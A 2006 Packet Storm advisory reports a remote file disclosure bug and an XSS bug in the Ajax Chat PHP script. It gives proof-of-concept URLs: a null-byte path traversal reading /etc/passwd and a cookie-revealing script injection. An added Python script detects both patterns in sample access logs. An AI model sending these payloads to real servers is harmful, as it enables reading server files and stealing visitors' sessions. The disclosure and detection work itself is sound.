ajaxchat.txt

2006-08-17T00:00:00
ID PACKETSTORM:48942
Type packetstorm
Reporter Sirdarckcat
Modified 2006-08-17T00:00:00

Description

`Discovered by Sirdarckcat from elhacker.net  
  
Ajax Chat  
http://www.pcdiscs.co.uk/chat/  
==============================================  
  
Ajax Chat is a web script for making an online  
chat based on PHP and AJAX.  
  
It has a Remote File Disclosure bug and an XSS bug.  
  
==============================================  
  
RFD PoC:  
  
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00  
  
==============================================  
  
XSS PoC:  
  
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>  
  
  
==============================================  
  
Regards,  
Sirdarckcat  
elhacker.net`
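
For defenders checking whether either request pattern above has reached a server, the following is an added detection example, not part of the original advisory or of Ajax Chat. It assumes combined-format access logs; the sample lines, client addresses and rule labels are constructed, and the nested percent-decoding goes slightly beyond the two PoC URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Aug/2006:10:00:01 +0000] "GET /includes/operator_chattranscript.php?chatid=1042 HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Aug/2006:10:00:07 +0000] "GET /includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00 HTTP/1.1" 200 1873',
    '198.51.100.3 - - [17/Aug/2006:10:01:00 +0000] "GET /visitor/livesupport/chat.php?userid=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 733',
    '198.51.100.4 - - [17/Aug/2006:10:01:30 +0000] "GET /visitor/livesupport/chat.php?userid=guest_17 HTTP/1.1" 200 701',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# (script name, parameter, label, predicate on the decoded parameter value)
RULES = [
    ("operator_chattranscript.php", "chatid", "file-disclosure",
     lambda v: ".." in v or "\x00" in v or v.startswith(("/", "\\"))),
    ("chat.php", "userid", "xss",
     lambda v: "<" in v or ">" in v),
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def scan(lines):
    """Return (client_ip, label, parameter) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1]
        # parse_qsl performs the first round of percent-decoding (%00 -> NUL)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            for rule_script, param, label, is_bad in RULES:
                if script == rule_script and name == param and is_bad(value):
                    hits.append((client, label, param))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on the `chatid` rule with a 200 response is worth correlating with the response size, since a transcript and a disclosed system file rarely have the same length.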